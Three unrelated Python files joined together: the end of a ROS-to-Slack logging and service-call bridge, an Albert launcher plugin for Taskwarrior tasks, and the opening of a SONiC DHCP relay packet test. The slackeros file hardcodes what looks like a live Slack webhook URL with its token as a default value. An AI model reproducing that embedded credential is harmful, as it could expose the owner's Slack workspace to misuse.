(self.sender_name, topic)
)
self._push(topic, att)
def _log_received(self, log_entry, topic):
# make sure we are not listening to ourselves
if log_entry.name == rospy.get_name():
return
level = log_entry.level
logger = log_entry.name
if level not in RosConnector.LEVEL_SETS[
self.active_loggers[logger]
]:
return
att = {
'text': (
'> %s\n'
'_level:_ `%s`\n'
'_file:_ `%s`\n'
'_function:_ `%s`\n'
'_line:_ `%s`\n' %
(
log_entry.msg,
RosConnector.REVERSE_LEVEL_SET[
log_entry.level],
log_entry.file,
log_entry.function,
log_entry.line
)
),
"mrkdwn_in": ["text", "pretext"],
"fallback": str(log_entry),
"pretext": "*%s*" % RosConnector.REVERSE_LEVEL_SET[
log_entry.level],
"color": self.LEVEL_COLORS[level],
'author_name': '%s@%s' % (logger, self.sender_name),
'footer': '%s' % str(datetime.utcfromtimestamp(
log_entry.header.stamp.secs)),
'ts': log_entry.header.stamp.secs
}
self.message_header['__logger__' + logger] = (
'*Logging Event* from node: `%s`' %
logger
)
self._push('__logger__' + logger, att)
def _roslogger(self, args):
parser = argparse.ArgumentParser(prog='/roslogger')
subparsers = parser.add_subparsers(dest='cmd',
help='sub-command')
subparsers.add_parser('enable', help='enable logging')
subparsers.add_parser('disable', help='disable logging')
subparsers.add_parser('list', help='show loggers')
parser_set = subparsers.add_parser(
            'set', help='set level for node: /roslogger set <nodename> {%s}' %
'|'. join(RosConnector.LEVEL_SETS.keys())
)
parser_set.add_argument(
'logger', help='logger to set'
)
parser_set.add_argument(
'level', help='level to set logger to',
choices=RosConnector.LEVEL_SETS.keys()
)
subparsers.add_parser(
'setall', help='set level for nodes: /roslogger setall {%s}' %
'|'. join(RosConnector.LEVEL_SETS.keys())
).add_argument(
'level', help='level to set logger to',
choices=RosConnector.LEVEL_SETS.keys()
)
try:
args = parser.parse_args(args)
except SystemExit:
return '```\n%s\n```' % parser.format_help()
if args.cmd == 'enable':
self._subscribe('/rosout', self._log_received)
self.logger_enabled = True
return 'subscribing to `/rosout`'
elif args.cmd == 'disable':
self._unsubscribe('/rosout')
self.logger_enabled = False
return 'unsubscribing from `/rosout`'
elif args.cmd == 'set':
self.active_loggers[args.logger] = args.level.lower()
return 'logger `%s` set to level `%s`' % (
args.logger,
args.level
)
elif args.cmd == 'setall':
self.default_level = args.level.lower()
for l in self.active_loggers:
self.active_loggers[l] = self.default_level
return 'all loggers set to level `%s`' % (
args.level
)
elif args.cmd == 'list':
loggers = [
('%s [%s]' % (l, self.active_loggers[l]))
for l in self.active_loggers]
return {
'attachments': [
{
'text': (
'*configured loggers:*\n```\n%s\n```'
% '\n'.join(loggers)),
'author_name': self.sender_name
}
],
'text': (
'_logging enabled_'
if self.logger_enabled else '~logging disabled~'
)
}
def _rostopic(self, args, payload):
parser = argparse.ArgumentParser(prog='/rostopic')
subparsers = parser.add_subparsers(dest='cmd',
help='sub-command')
subparsers.add_parser('list', help='show topics')
subparsers.add_parser(
'subscribe', help='subscribe to topic: /rostopic subscribe <topic>'
).add_argument(
            'topic', help='topic to subscribe to'
)
subparsers.add_parser(
'unsubscribe', help='unsubscribe from topic:'
' /rostopic unsubscribe <topic>'
).add_argument(
            'topic', help='topic to unsubscribe from'
)
subparsers.add_parser(
            'poll', help='poll one value from topic: /rostopic poll <topic>'
).add_argument(
            'topic', help='topic to poll from'
)
try:
args = parser.parse_args(args)
except SystemExit:
return '```\n%s\n```' % parser.format_help()
if args.cmd == 'subscribe':
self._subscribe(args.topic)
return 'subscribing to `%s`' % args.topic
elif args.cmd == 'unsubscribe':
self._unsubscribe(args.topic)
return 'unsubscribing from `%s`' % args.topic
elif args.cmd == 'poll':
return '```\n%s\n```' % self._poll(args.topic, payload)
elif args.cmd == 'list':
topics = rospy.get_published_topics()
tops = [('%s [%s]' % (t[0], t[1])) for t in topics]
return {
'attachments': [
{
'text': (
'*Currently published topics:*\n```\n%s\n```'
% '\n'.join(tops)),
'author_name': self.sender_name
},
{
'text': (
'*Currently subscribed by'
' Slack*:\n```\n%s\n```'
% '\n'.join(self.subs)),
'author_name': self.sender_name
}
],
'text': '_Topics:_'
}
def __call_service(self, service_name, service_args, service_class=None):
import std_msgs.msg
if service_class is None:
service_class = get_service_class_by_name(service_name)
request = service_class._request_class()
try:
now = rospy.get_rostime()
keys = {'now': now, 'auto': std_msgs.msg.Header(stamp=now)}
roslib.message.fill_message_args(request, service_args, keys=keys)
except roslib.message.ROSMessageException, e:
def argsummary(args):
if type(args) in [tuple, list]:
return '\n'.join(
[
' * %s (type %s)' % (a, type(a).__name__)
for a in args])
else:
return ' * %s (type %s)' % (args, type(args).__name__)
return (
"Incompatible arguments to call service:\n%s\n"
"Provided arguments are:\n%s\n\nService arguments are: [%s]"
% (
e, argsummary(service_args),
roslib.message.get_printable_message_args(request)))
try:
return rospy.ServiceProxy(
service_name, service_class)(request)
except rospy.ServiceException, e:
return str(e)
except roslib.message.SerializationError, e:
return (
"Unable to send request."
" One of the fields has an incorrect type:\n"
" %s\n\nsrv file:\n%s"
% (
e,
rosmsg.get_srv_text(service_class._type)))
except rospy.ROSSerializationException, e:
return (
"Unable to send request."
" One of the fields has an incorrect type:\n"
" %s\n\nsrv file:\n%s" % (
e, rosmsg.get_srv_text(service_class._type)))
def _rosservice(self, args):
parser = argparse.ArgumentParser(prog='/rosservice')
subparsers = parser.add_subparsers(dest='cmd',
help='sub-command')
subparsers.add_parser('list', help='show services')
subparsers.add_parser(
            'call', help='call service: /rosservice call <service> [<args>]'
        ).add_argument(
            'service', help='service to call'
)
try:
            args, additional_args = parser.parse_known_args(args)
except SystemExit:
return '```\n%s\n```' % parser.format_help()
try:
if args.cmd == 'call':
                resp = self.__call_service(args.service, additional_args)
return {
'attachments': [
{
'text': 'Response:\n```\n%s\n```' % resp,
'author_name': '%s@%s' % (
args.service, self.sender_name
)
}
],
'text': '_called `%s`_' % args.service
}
elif args.cmd == 'list':
services = get_service_list()
return {
'attachments': [
{
'text': (
'*Currently available services:*\n```\n%s\n```'
% '\n'.join(services)),
'author_name': 'ROS master@%s' % self.sender_name
}
],
'text': '_Services:_'
}
except Exception as e:
return '```\n%s\n```' % str(e)
def on_slash(self, service, payload):
args = payload['text'].split(' ')
if service == 'rostopic':
return self._rostopic(args, payload)
elif service == 'rosservice':
return self._rosservice(args)
elif service == 'roslogger':
return self._roslogger(args)
else:
args[0] = self.ROS_PREFIX + '/' + service
return self._rosservice(args)
if __name__ == '__main__':
signal.signal(signal.SIGINT, __signal_handler)
rospy.init_node('slackeros')
hook = rospy.get_param(
'~webhook',
'https://hooks.slack.com/services/'
'TCTBP6280/BCU8QFBE1/l2B4r7TRzLJJ37zyhXqtICov')
token = rospy.get_param(
'~access_token',
'xoxb-xxxxxxxxxxxxx-xxxxxxxxxxxxxxxxx-xxxxxxxxxxxxxxx')
wl_users = rospy.get_param(
'~users', '')
wl_channels = rospy.get_param(
'~channels', '')
image_up_channels = rospy.get_param(
'~image_upload_channels', '')
topics = rospy.get_param(
'~topics', '')
url_prefix = rospy.get_param(
'~url_prefix', '')
sc = RosConnector(
incoming_webhook=hook,
access_token=token,
whitelist_users=wl_users.split(' '),
whitelist_channels=wl_channels.split(' '),
image_up_channels=image_up_channels.split(' '),
topics=topics.split(' '),
prefix=url_prefix
)
sc.run()
|
__init__.py
|
"""Interact with Taskwarrior."""
import datetime
import os
import re
import threading
import traceback
from abc import ABCMeta, abstractmethod
from pathlib import Path
from shutil import which
from subprocess import PIPE, Popen
from typing import List, Optional, Tuple, Union
import albert as v0 # type: ignore
import dateutil
import gi
import taskw
from fuzzywuzzy import process
from overrides import overrides
from taskw_gcal_sync import TaskWarriorSide
gi.require_version("Notify", "0.7") # isort:skip
gi.require_version("GdkPixbuf", "2.0") # isort:skip
from gi.repository import GdkPixbuf, Notify # isort:skip # type: ignore
# metadata ------------------------------------------------------------------------------------
__title__ = "Taskwarrior interaction"
__version__ = "0.4.0"
__triggers__ = "t "
__authors__ = "Nikos Koukis"
__homepage__ = "https://github.com/bergercookie/awesome-albert-plugins"
__simplename__ = "taskwarrior"
# initial checks ------------------------------------------------------------------------------
# icon ----------------------------------------------------------------------------------------
icon_path = os.path.join(os.path.dirname(__file__), "taskwarrior.svg")
icon_path_b = os.path.join(os.path.dirname(__file__), "taskwarrior_blue.svg")
icon_path_r = os.path.join(os.path.dirname(__file__), "taskwarrior_red.svg")
icon_path_y = os.path.join(os.path.dirname(__file__), "taskwarrior_yellow.svg")
icon_path_c = os.path.join(os.path.dirname(__file__), "taskwarrior_cyan.svg")
icon_path_g = os.path.join(os.path.dirname(__file__), "taskwarrior_green.svg")
# initial configuration -----------------------------------------------------------------------
# should the plugin show relevant some info without the trigger?
show_items_wo_trigger = True
failure_tag = "fail"
cache_path = Path(v0.cacheLocation()) / __simplename__
config_path = Path(v0.configLocation()) / __simplename__
data_path = Path(v0.dataLocation()) / __simplename__
reminders_tag_path = config_path / "reminders_tag"
reminders_tag = "remindme"
class FileBackedVar:
def __init__(self, varname, convert_fn=str, init_val=None):
self._fpath = config_path / varname
self._convert_fn = convert_fn
if init_val:
with open(self._fpath, "w") as f:
f.write(str(init_val))
else:
self._fpath.touch()
def get(self):
with open(self._fpath, "r") as f:
return self._convert_fn(f.read().strip())
def set(self, val):
with open(self._fpath, "w") as f:
return f.write(str(val))
class TaskWarriorSideWLock:
"""Multithreading-safe version of TaskWarriorSide."""
def __init__(self):
self.tw = TaskWarriorSide(enable_caching=True)
self.tw_lock = threading.Lock()
def start(self, *args, **kargs):
with self.tw_lock:
return self.tw.start(*args, **kargs)
def get_all_items(self, *args, **kargs):
with self.tw_lock:
return self.tw.get_all_items(*args, **kargs)
def get_task_id(self, *args, **kargs):
with self.tw_lock:
return self.tw.get_task_id(*args, **kargs)
@property
def reload_items(self):
return self.tw.reload_items
@reload_items.setter
def reload_items(self, val: bool):
self.tw.reload_items = val
def update_item(self, *args, **kargs):
self.tw.update_item(*args, **kargs)
tw_side = TaskWarriorSideWLock()
last_used_date = FileBackedVar(
"last_date_used",
convert_fn=lambda s: datetime.datetime.strptime(s, "%Y-%m-%d").date(),
init_val=datetime.datetime.today().date(),
)
dev_mode = True
# regular expression to match URLs
# https://gist.github.com/gruber/8891611
url_re = re.compile(
r"""(?i)\b((?:https?:(?:/{1,3}|[a-z0-9%])|[a-z0-9.\-]+[.](?:com|net|org|edu|gov|mil|aero|asia|biz|cat|coop|info|int|jobs|mobi|museum|name|post|pro|tel|travel|xxx|ac|ad|ae|af|ag|ai|al|am|an|ao|aq|ar|as|at|au|aw|ax|az|ba|bb|bd|be|bf|bg|bh|bi|bj|bm|bn|bo|br|bs|bt|bv|bw|by|bz|ca|cc|cd|cf|cg|ch|ci|ck|cl|cm|cn|co|cr|cs|cu|cv|cx|cy|cz|dd|de|dj|dk|dm|do|dz|ec|ee|eg|eh|er|es|et|eu|fi|fj|fk|fm|fo|fr|ga|gb|gd|ge|gf|gg|gh|gi|gl|gm|gn|gp|gq|gr|gs|gt|gu|gw|gy|hk|hm|hn|hr|ht|hu|id|ie|il|im|in|io|iq|ir|is|it|je|jm|jo|jp|ke|kg|kh|ki|km|kn|kp|kr|kw|ky|kz|la|lb|lc|li|lk|lr|ls|lt|lu|lv|ly|ma|mc|md|me|mg|mh|mk|ml|mm|mn|mo|mp|mq|mr|ms|mt|mu|mv|mw|mx|my|mz|na|nc|ne|nf|ng|ni|nl|no|np|nr|nu|nz|om|pa|pe|pf|pg|ph|pk|pl|pm|pn|pr|ps|pt|pw|py|qa|re|ro|rs|ru|rw|sa|sb|sc|sd|se|sg|sh|si|sj|Ja|sk|sl|sm|sn|so|sr|ss|st|su|sv|sx|sy|sz|tc|td|tf|tg|th|tj|tk|tl|tm|tn|to|tp|tr|tt|tv|tw|tz|ua|ug|uk|us|uy|uz|va|vc|ve|vg|vi|vn|vu|wf|ws|ye|yt|yu|za|zm|zw)/)(?:[^\s()<>{}\[\]]+|\([^\s()]*?\([^\s()]+\)[^\s()]*?\)|\([^\s]+?\))+(?:\([^\s()]*?\([^\s()]+\)[^\s()]*?\)|\([^\s]+?\)|[^\s`!()\[\]{};:'".,<>?«»“”‘’])|(?:(?<!@)[a-z0-9]+(?:[.\-][a-z0-9]+)*[.](?:com|net|org|edu|gov|mil|aero|asia|biz|cat|coop|info|int|jobs|mobi|museum|name|post|pro|tel|travel|xxx|ac|ad|ae|af|ag|ai|al|am|an|ao|aq|ar|as|at|au|aw|ax|az|ba|bb|bd|be|bf|bg|bh|bi|bj|bm|bn|bo|br|bs|bt|bv|bw|by|bz|ca|cc|cd|cf|cg|ch|ci|ck|cl|cm|cn|co|cr|cs|cu|cv|cx|cy|cz|dd|de|dj|dk|dm|do|dz|ec|ee|eg|eh|er|es|et|eu|fi|fj|fk|fm|fo|fr|ga|gb|gd|ge|gf|gg|gh|gi|gl|gm|gn|gp|gq|gr|gs|gt|gu|gw|gy|hk|hm|hn|hr|ht|hu|id|ie|il|im|in|io|iq|ir|is|it|je|jm|jo|jp|ke|kg|kh|ki|km|kn|kp|kr|kw|ky|kz|la|lb|lc|li|lk|lr|ls|lt|lu|lv|ly|ma|mc|md|me|mg|mh|mk|ml|mm|mn|mo|mp|mq|mr|ms|mt|mu|mv|mw|mx|my|mz|na|nc|ne|nf|ng|ni|nl|no|np|nr|nu|nz|om|pa|pe|pf|pg|ph|pk|pl|pm|pn|pr|ps|pt|pw|py|qa|re|ro|rs|ru|rw|sa|sb|sc|sd|se|sg|sh|si|sj|Ja|sk|sl|sm|sn|so|sr|ss|st|su|sv|sx|sy|sz|tc|td|tf|tg|th|tj|tk|tl|tm|tn|to|tp|tr|tt|tv|tw|tz|ua|ug|uk|us|uy|uz|va|vc|ve|vg|vi|vn|vu|wf|ws|ye|yt|yu|za|zm|zw)\b/?(?!@)))"""
)
# plugin main functions -----------------------------------------------------------------------
def do_notify(msg: str, image=None):
app_name = "Taskwarrior"
Notify.init(app_name)
n = Notify.Notification.new(app_name, msg, image)
n.show()
def date_only_tzlocal(dt: datetime.datetime):
    return dt.astimezone(dateutil.tz.tzlocal()).date()  # type: ignore
def get_tasks_of_date(date: datetime.date):
tasks = tw_side.get_all_items(skip_completed=True)
# You have to do the comparison in tzlocal. TaskWarrior stores the tasks in UTC and thus
    # the effective date*time* may not match the given date parameter because of the time
# difference
tasks = [t for t in tasks if "due" in t.keys() and date_only_tzlocal(t["due"]) == date]
return tasks
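# Illustrative example of why the local-timezone conversion above matters (hypothetical
# values, not taken from any real task list): a task stored by TaskWarrior with
# due 2021-03-01T22:30:00 UTC is due on 2021-03-02 for a user in UTC+02:00, so comparing
# the raw UTC date against `date` would miss it; date_only_tzlocal() converts to the
# local zone before taking the date.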
def initialize():
# Called when the extension is loaded (ticked in the settings) - blocking
# create cache location
config_path.mkdir(parents=False, exist_ok=True)
def finalize():
pass
def handleQuery(query):
results = []
    # if we have moved into a new day, create and assign a fresh TaskWarrior instance
last_used = last_used_date.get()
current_date = datetime.datetime.today().date()
global tw_side, subcommands
if last_used < current_date:
tw_side = TaskWarriorSideWLock()
subcommands = create_subcommands()
last_used_date.set(current_date)
elif last_used > current_date:
# maybe due to NTP?
v0.critical(
f"Current date {current_date} < last_used date {last_used} ?! Overriding current date, please report this if it persists"
)
tw_side = TaskWarriorSideWLock()
subcommands = create_subcommands()
last_used_date.set(current_date)
if not query.isTriggered:
if show_items_wo_trigger and len(query.string) < 2:
results = [
ActiveTasks().get_as_albert_item(),
TodayTasks().get_as_albert_item(),
*results,
]
else:
        # join any previously launched worker threads
        while workers:
            workers.pop().join(2)
try:
query.disableSort()
results_setup = setup(query)
if results_setup:
return results_setup
tasks = tw_side.get_all_items(skip_completed=True)
query_str = query.string
if len(query_str) < 2:
results.extend([s.get_as_albert_item() for s in subcommands])
results.append(
get_as_item(
text="Reload list of tasks",
actions=[v0.FuncAction("Reload", async_reload_items)],
)
)
tasks.sort(key=lambda t: t["urgency"], reverse=True)
results.extend([get_tw_item(task) for task in tasks])
else:
subcommand_query = get_subcommand_query(query_str)
if subcommand_query:
results.extend(
subcommand_query.command.get_as_albert_items_full(
subcommand_query.query
)
)
if not results:
results.append(get_as_item(text="No results"))
else:
# find relevant results
desc_to_task = {task["description"]: task for task in tasks}
matched = process.extract(query_str, list(desc_to_task.keys()), limit=30)
for m in [elem[0] for elem in matched]:
task = desc_to_task[m]
results.append(get_tw_item(task))
        except Exception:  # let the user copy and report the error
if dev_mode:
v0.critical(traceback.format_exc())
raise
results.insert(
0,
v0.Item(
id=__title__,
icon=icon_path,
text="Something went wrong! Press [ENTER] to copy error and report it",
actions=[
v0.ClipAction(
f"Copy error - report it to {__homepage__[8:]}",
f"{traceback.format_exc()}",
)
],
),
)
return results
def get_as_item(**kargs) -> v0.Item:
if "icon" in kargs:
icon = kargs.pop("icon")
else:
icon = icon_path
return v0.Item(id=__title__, icon=icon, **kargs)
# supplementary functions ---------------------------------------------------------------------
workers: List[threading.Thread] = []
def async_reload_items():
def do_reload():
v0.info("TaskWarrior: Updating list of tasks...")
tw_side.reload_items = True
tw_side.get_all_items(skip_completed=True)
t = threading.Thread(target=do_reload)
t.start()
workers.append(t)
def setup(query): # type: ignore
results = []
if not which("task"):
results.append(
v0.Item(
id=__title__,
icon=icon_path,
text=f'"taskwarrior" is not installed.',
subtext='Please install and configure "taskwarrior" accordingly.',
actions=[
v0.UrlAction(
'Open "taskwarrior" website', "https://taskwarrior.org/download/"
)
],
)
)
return results
return results
def save_data(data: str, data_name: str):
"""Save a piece of data in the configuration directory."""
with open(config_path / data_name, "w") as f:
f.write(data)
def load_data(data_name) -> str:
"""Load a piece of data from the configuration directory."""
with open(config_path / data_name, "r") as f:
data = f.readline().strip().split()[0]
return data
def get_as_subtext_field(field, field_title=None):
s = ""
if field:
s = f"{field} | "
else:
return ""
if field_title:
s = f"{field_title}:" + s
return s
def urgency_to_visuals(prio: Union[float, None]) -> Tuple[Union[str, None], Path]:
if prio is None:
return None, Path(icon_path)
elif prio < 4:
return "↓", Path(icon_path_b)
elif prio < 8:
return "↘", Path(icon_path_c)
elif prio < 11:
return "-", Path(icon_path_g)
elif prio < 15:
return "↗", Path(icon_path_y)
else:
return "↑", Path(icon_path_r)
def fail_task(task_id: list):
run_tw_action(args_list=[task_id, "modify", "+fail"])
run_tw_action(args_list=[task_id, "done"])
def run_tw_action(args_list: list, need_pty=False):
args_list = ["task", "rc.recurrence.confirmation=no", "rc.confirmation=off", *args_list]
if need_pty:
args_list.insert(0, "x-terminal-emulator")
args_list.insert(1, "-e")
proc = Popen(args_list, stdout=PIPE, stderr=PIPE)
stdout, stderr = proc.communicate()
if proc.returncode != 0:
image = icon_path_r
msg = f'stdout: {stdout.decode("utf-8")} | stderr: {stderr.decode("utf-8")}'
else:
image = icon_path
msg = stdout.decode("utf-8")
do_notify(msg=msg, image=image)
async_reload_items()
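# Illustrative usage of run_tw_action (hypothetical task id "a1b2c3d4"):
#   run_tw_action(["start", "a1b2c3d4"]) executes
#       task rc.recurrence.confirmation=no rc.confirmation=off start a1b2c3d4
#   run_tw_action(["edit", "a1b2c3d4"], need_pty=True) prefixes "x-terminal-emulator -e"
#   so that the interactive `task edit` session gets its own terminal.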
def get_tw_item(task: taskw.task.Task) -> v0.Item: # type: ignore
"""Get a single TW task as an Albert Item."""
field = get_as_subtext_field
task_id = tw_side.get_task_id(task)
actions = [
v0.FuncAction(
"Complete task",
lambda args_list=["done", task_id]: run_tw_action(args_list),
),
v0.FuncAction(
"Delete task",
lambda args_list=["delete", task_id]: run_tw_action(args_list),
),
v0.FuncAction(
"Start task",
lambda args_list=["start", task_id]: run_tw_action(args_list),
),
v0.FuncAction(
"Stop task",
lambda args_list=["stop", task_id]: run_tw_action(args_list),
),
v0.FuncAction(
"Edit task interactively",
lambda args_list=["edit", task_id]: run_tw_action(args_list, need_pty=True),
),
v0.FuncAction(
"Fail task",
lambda task_id=task_id: fail_task(task_id=task_id),
),
v0.ClipAction("Copy task UUID", f"{task_id}"),
]
found_urls = url_re.findall(task["description"])
if "annotations" in task.keys():
found_urls.extend(url_re.findall(" ".join(task["annotations"])))
for url in found_urls[-1::-1]:
actions.insert(0, v0.UrlAction(f"Open {url}", url))
if reminders_tag_path.is_file():
global reminders_tag
reminders_tag = load_data(reminders_tag_path)
else:
save_data("remindme", reminders_tag_path)
actions.append(
v0.FuncAction(
f"Add to Reminders (+{reminders_tag})",
lambda args_list=[
"modify",
task_id,
f"+{reminders_tag}",
]: run_tw_action(args_list),
)
)
urgency_str, icon = urgency_to_visuals(task.get("urgency"))
text = f'{task["description"]}'
if "start" in task:
text = f'<p style="color:orange;">{text}</p>'
due = None
if "due" in task:
due = task["due"].astimezone(dateutil.tz.tzlocal()).strftime("%Y-%m-%d %H:%M:%S") # type: ignore
return get_as_item(
text=text,
subtext="{}{}{}{}{}".format(
field(urgency_str),
"ID: {}... | ".format(tw_side.get_task_id(task)[:8]),
field(task["status"]),
field(task.get("tags"), "tags"),
field(due, "due"),
)[:-2],
icon=str(icon),
completion=f'{__triggers__}{task["description"]}',
actions=actions,
)
# subcommands ---------------------------------------------------------------------------------
class Subcommand:
def __init__(self, *, name, desc):
self.name = name
self.desc = desc
self.subcommand_prefix = f"{__triggers__}{self.name}"
def get_as_albert_item(self):
return get_as_item(text=self.desc, completion=f"{self.subcommand_prefix} ")
def get_as_albert_items_full(self, query_str):
return [self.get_as_albert_item()]
def __str__(self) -> str:
return f"Name: {self.name} | Description: {self.desc}"
class AddSubcommand(Subcommand):
def __init__(self):
super(AddSubcommand, self).__init__(name="add", desc="Add a new task")
@overrides
def get_as_albert_items_full(self, query_str):
items = []
add_item = self.get_as_albert_item()
add_item.subtext = query_str
add_item.completion = f"{self.subcommand_prefix} {query_str}"
add_item.addAction(
v0.FuncAction(
"Add task",
lambda args_list=["add", *query_str.split()]: run_tw_action(args_list),
)
)
items.append(add_item)
        to_reminders = v0.Item(
            id=__title__,
            text=f"Add +{reminders_tag} tag",
            subtext=f"Add +{reminders_tag} on [TAB]",
            icon=icon_path_y,
            completion=f"{self.subcommand_prefix} {query_str} +{reminders_tag}",
        )
items.append(to_reminders)
def item_at_date(date: datetime.date, time_24h: int):
dt_str = f'{date.strftime("%Y%m%d")}T{time_24h}0000'
return v0.Item(
id=__title__,
text=f"Due {date}, at {time_24h}:00",
subtext="Add due:dt_str on [TAB]",
icon=icon_path_c,
completion=f"{self.subcommand_prefix} {query_str} due:{dt_str}",
)
items.append(item_at_date(datetime.date.today(), time_24h=15))
items.append(item_at_date(datetime.date.today(), time_24h=19))
items.append(item_at_date(datetime.date.today() + datetime.timedelta(days=1),
time_24h=10))
items.append(item_at_date(datetime.date.today() + datetime.timedelta(days=1),
time_24h=15))
items.append(item_at_date(datetime.date.today() + datetime.timedelta(days=1),
time_24h=19))
return items
class LogSubcommand(Subcommand):
def __init__(self):
super(LogSubcommand, self).__init__(name="log", desc="Log an already done task")
@overrides
def get_as_albert_items_full(self, query_str):
item = self.get_as_albert_item()
item.subtext = query_str
item.addAction(
v0.FuncAction(
"Log task",
lambda args_list=["log", *query_str.split()]: run_tw_action(args_list),
)
)
return [item]
class ActiveTasks(Subcommand):
def __init__(self):
super(ActiveTasks, self).__init__(name="active", desc="Active tasks")
@overrides
def get_as_albert_items_full(self, query_str):
return [
get_tw_item(t) for t in tw_side.get_all_items(skip_completed=True) if "start" in t
]
def move_tasks_of_date_to_next_day(date: datetime.date):
for t in get_tasks_of_date(date):
tw_side.update_item(item_id=str(t["uuid"]), due=t["due"] + datetime.timedelta(days=1))
class DateTasks(Subcommand):
"""
    Common parent of classes like TodayTasks and YesterdayTasks, so as to not repeat ourselves.
"""
def __init__(self, date: datetime.date, *args, **kargs):
super(DateTasks, self).__init__(*args, **kargs)
self.date = date
@overrides
def get_as_albert_item(self):
item = super().get_as_albert_item()
item.addAction(
v0.FuncAction(
"Move tasks to the day after",
lambda date=self.date: move_tasks_of_date_to_next_day(date),
)
)
return item
@overrides
def get_as_albert_items_full(self, query_str):
return [get_tw_item(t) for t in get_tasks_of_date(self.date)]
class TodayTasks(DateTasks):
def __init__(self):
super(TodayTasks, self).__init__(
date=datetime.date.today(), name="today", desc="Today's tasks"
)
class YesterdayTasks(DateTasks):
def __init__(self):
super(YesterdayTasks, self).__init__(
date=datetime.date.today() - datetime.timedelta(days=1),
name="yesterday",
desc="Yesterday's tasks",
)
class TomorrowTasks(DateTasks):
def __init__(self):
super(TomorrowTasks, self).__init__(
date=datetime.date.today() + datetime.timedelta(days=1),
name="tomorrow",
desc="Tomorrow's tasks",
)
class SubcommandQuery:
def __init__(self, subcommand: Subcommand, query: str):
"""
Query for a specific subcommand.
:query: Query text - doesn't include the subcommand itself
"""
self.command = subcommand
self.query = query
def __str__(self) -> str:
return f"Command: {self.command}\nQuery Text: {self.query}"
def create_subcommands():
return [
AddSubcommand(),
LogSubcommand(),
ActiveTasks(),
TodayTasks(),
YesterdayTasks(),
TomorrowTasks(),
]
subcommands = create_subcommands()
def get_subcommand_for_name(name: str) -> Optional[Subcommand]:
"""Get a subcommand with the indicated name."""
matching = [s for s in subcommands if s.name.lower() == name.lower()]
if matching:
return matching[0]
def get_subcommand_query(query_str: str) -> Optional[SubcommandQuery]:
"""
Determine whether current query is of a subcommand.
If so first returned the corresponding SubcommandQeury object.
"""
if not query_str:
return None
    # split:
    # "subcommand_name rest of query" -> ["subcommand_name", "rest of query"]
query_parts = query_str.strip().split(None, maxsplit=1)
if len(query_parts) < 2:
query_str = ""
else:
query_str = query_parts[1]
subcommand = get_subcommand_for_name(query_parts[0])
if subcommand:
return SubcommandQuery(subcommand=subcommand, query=query_str)
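# Illustrative example of the subcommand parsing above (hypothetical input): with the
# "add" subcommand registered,
#   get_subcommand_query("add buy milk +home")
# returns SubcommandQuery(command=<AddSubcommand>, query="buy milk +home"), whereas
# get_subcommand_query("buy milk") returns None because "buy" is not a known subcommand.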
|
dhcp_relay_test.py
|
import ast
import os
import struct
import ipaddress
import binascii
# Packet Test Framework imports
import ptf
import ptf.packet as scapy
import ptf.testutils as testutils
from ptf import config
from ptf.base_tests import BaseTest
from ptf.mask import Mask
import scapy.all as scapy2
from threading import Thread
# Helper function to increment an IP address
# ip_addr should be passed as a dot-decimal string
# Return value is also a dot-decimal string
def incrementIpAddress(ip_addr, by=1):
new_addr = ipaddress.ip_address(str(ip_addr))
new_addr = new_addr + by
return str(new_addr)
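# Illustrative usage of incrementIpAddress (values are only examples):
#   incrementIpAddress("192.168.0.1")        -> "192.168.0.2"
#   incrementIpAddress("192.168.0.1", by=10) -> "192.168.0.11"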
class DataplaneBaseTest(BaseTest):
def __init__(self):
BaseTest.__init__(self)
def setUp(self):
self.dataplane = ptf.dataplane_instance
self.dataplane.flush()
if config["log_dir"] is not None:
filename = os.path.join(config["log_dir"], str(self)) + ".pcap"
self.dataplane.start_pcap(filename)
def tearDown(self):
if config["log_dir"] is not None:
self.dataplane.stop_pcap()
"""
This test simulates a new host booting up on the VLAN network of a ToR and
requesting an IP address via DHCP. Setup is as follows:
- DHCP client is simulated by listening/sending on an interface connected to VLAN of ToR.
- DHCP server is simulated by listening/sending on injected PTF interfaces which link
ToR to leaves. This way we can listen for traffic sent from DHCP relay out to would-be DHCP servers
This test performs the following functionality:
1.) Simulated client broadcasts a DHCPDISCOVER message
2.) Verify DHCP relay running on ToR receives the DHCPDISCOVER message
and relays it to all of its known DHCP servers, appending the proper Option 82 information
3.) Simulate DHCPOFFER message broadcast from a DHCP server to the ToR
4.) Verify DHCP relay receives the DHCPOFFER message and forwards it to our
simulated client.
5.) Simulated client broadcasts a DHCPREQUEST message
6.) Verify DHCP relay running on ToR receives the DHCPREQUEST message
and relays it to all of its known DHCP servers, appending the proper Option 82 information
7.) Simulate DHCPACK message sent from a DHCP server to the ToR
8.) Verify DHCP relay receives the DHCPACK message and forwards it to our
simulated client.
To run: place the following in a shell script (this will test against str-s6000-acs-12 (ec:f4:bb:fe:88:0a)):
ptf --test-dir ptftests dhcp_relay_test.DHCPTest --platform remote -t "hostname=\"str-s6000-acs-12\"; client_port_index=\"1\"; client_iface_alias=\"fortyGigE0/4\"; leaf_port_indices=\"[29, 31, 28, 30]\"; num_dhcp_servers=\"48\"; server_ip=\"192.0.0.1\"; relay_iface_ip=\"192.168.0.1\"; relay_iface_mac=\"ec:f4:bb:fe:88:0a\"; relay_iface_netmask=\"255.255.255.224\"" --disable-vxlan --disable-geneve --disable-erspan --disable-mpls --disable-nvgre
The above command is configured to test with the following configuration:
- VLAN IP of DuT is 192.168.0.1, MAC address is ec:f4:bb:fe:88:0a (this is configured to test against str-s6000-acs-12)
- Simulated client will live on PTF interface eth4 (interface number 4)
- Assumes leaf switches are connected to injected PTF interfaces 28, 29, 30, 31
- Test will simulate replies from server with IP '192.0.0.1'
- Simulated server will offer simulated client IP '192.168.0.2' with a subnet of '255.255.255.0' (this should be in the VLAN of DuT)
DHCP Relay currently installed with SONiC is isc-dhcp-relay
TODO???:
1) DHCP Renew Test
2) DHCP NACK Test
3) Test with multiple DHCP Servers
"""
class DHCPTest(DataplaneBaseTest):
BROADCAST_MAC = 'ff:ff:ff:ff:ff:ff'
BROADCAST_IP = '255.255.255.255'
DEFAULT_ROUTE_IP = '0.0.0.0'
DHCP_CLIENT_PORT = 68
DHCP_SERVER_PORT = 67
DHCP_LEASE_TIME_OFFSET = 292
DHCP_LEASE_TIME_LEN = 6
LEASE_TIME = 86400
DHCP_PKT_BOOTP_MIN_LEN = 300
def __init__(self):
DataplaneBaseTest.__init__(self)
def setUp(self):
DataplaneBaseTest.setUp(self)
self.test_params = testutils.test_params_get()
self.hostname = self.test_params['hostname']
self.verified_option82 = False
if 'other_client_port' in self.test_params:
self.other_client_port = ast.literal_eval(self.test_params['other_client_port'])
